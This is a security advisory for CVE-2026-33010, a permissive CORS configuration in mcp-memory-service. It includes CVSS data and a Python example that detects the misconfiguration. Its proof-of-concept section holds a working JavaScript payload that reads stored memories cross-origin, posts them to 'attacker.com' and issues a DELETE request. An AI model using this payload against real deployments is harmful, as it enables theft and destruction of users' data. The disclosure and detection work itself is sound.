Security Vulnerability Report
CVE-2026-33010 CVSS 8.1 HIGH

Published: 2026-03-20 19:16:18
Last Modified: 2026-04-14 18:12:23

Description

mcp-memory-service is an open-source memory backend for multi-agent systems. Prior to version 10.25.1, when the HTTP server is enabled (MCP_HTTP_ENABLED=true), the application configures FastAPI's CORSMiddleware with allow_origins=['*'], allow_credentials=True, allow_methods=["*"], and allow_headers=["*"]. The wildcard Access-Control-Allow-Origin: * header permits any website to read API responses cross-origin. When combined with anonymous access (MCP_ALLOW_ANONYMOUS_ACCESS=true) - the simplest way to get the HTTP dashboard working without OAuth - no credentials are needed, so any malicious website can silently read, modify, and delete all stored memories. This issue has been patched in version 10.25.1.
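A small Python model of the misconfiguration, added here as an example and not taken from the advisory or from the mcp-memory-service code base: it flags the CORSMiddleware kwarg combination described above and applies the Fetch-spec CORS check to show which origins a browser lets read responses under a wildcard config versus an explicit allowlist. The config dicts, the placeholder origin and the helper names are assumptions; the header emission is a simplified model, not Starlette's exact logic.

```python
# Added example, not code from the advisory or from mcp-memory-service.
# Models the CORS check a browser applies (Fetch spec) and flags the
# CORSMiddleware keyword combination the advisory describes. Both config
# dicts are constructed samples that reuse CORSMiddleware's kwarg names.

VULNERABLE_CFG = {"allow_origins": ["*"], "allow_credentials": True}
# Explicit allowlist instead of '*'; the origin value is a placeholder.
HARDENED_CFG = {"allow_origins": ["http://localhost:8000"], "allow_credentials": True}


def cors_findings(cfg, anonymous_access=False):
    """Return a list of findings for a CORSMiddleware-style config dict."""
    findings = []
    wildcard = "*" in cfg.get("allow_origins", [])
    if wildcard and cfg.get("allow_credentials"):
        findings.append("allow_origins=['*'] combined with allow_credentials=True")
    if wildcard and anonymous_access:
        findings.append("wildcard origin plus anonymous access: any site can read the API")
    return findings


def response_headers(cfg, request_origin):
    """Simplified model of the CORS headers a server with cfg adds to a response:
    a wildcard config emits '*', an allowlist config echoes a matching origin."""
    hdrs = {}
    if "*" in cfg["allow_origins"]:
        hdrs["Access-Control-Allow-Origin"] = "*"
    elif request_origin in cfg["allow_origins"]:
        hdrs["Access-Control-Allow-Origin"] = request_origin
    if cfg.get("allow_credentials"):
        hdrs["Access-Control-Allow-Credentials"] = "true"
    return hdrs


def browser_exposes(request_origin, credentials_mode, hdrs):
    """Fetch-spec CORS check: may a page at request_origin read this response?"""
    acao = hdrs.get("Access-Control-Allow-Origin")
    if acao is None:
        return False
    if credentials_mode != "include" and acao == "*":
        return True
    if acao != request_origin:  # '*' never matches once credentials are sent
        return False
    if credentials_mode != "include":
        return True
    return hdrs.get("Access-Control-Allow-Credentials") == "true"
```

With the anonymous-access deployment the advisory describes, browser_exposes returns True for any origin against VULNERABLE_CFG and only for the allowlisted origin against HARDENED_CFG.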

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Primary CVSS score (NVD record): 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Weakness: CWE-942 (Permissive Cross-domain Policy with Untrusted Domains)

Configurations (Affected Products)

cpe:2.3:a:doobidoo:mcp-memory-service:*:*:*:*:*:*:*:* - VULNERABLE
mcp-memory-service < 10.25.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2026-33010 -->
<!-- This script demonstrates the impact of CORS misconfiguration -->
<script>
const targetUrl = 'http://vulnerable-target:port/api/memories';

// Attempt to read data
fetch(targetUrl, {
  method: 'GET',
  credentials: 'include', // Sending cookies if any
  headers: { 'Content-Type': 'application/json' }
})
  .then(response => response.json())
  .then(data => {
    console.log('Leaked Data:', data);
    // Send data to attacker's server
    fetch('https://attacker.com/log', { method: 'POST', body: JSON.stringify(data) });
  })
  .catch(error => console.error('Error:', error));

// Attempt to delete data
fetch(targetUrl + '/1', { method: 'DELETE', credentials: 'include' });
</script>

References

https://github.com/doobidoo/mcp-memory-service/security/advisories/GHSA-g9rg-8vq5-mpwm (Exploit, Vendor Advisory)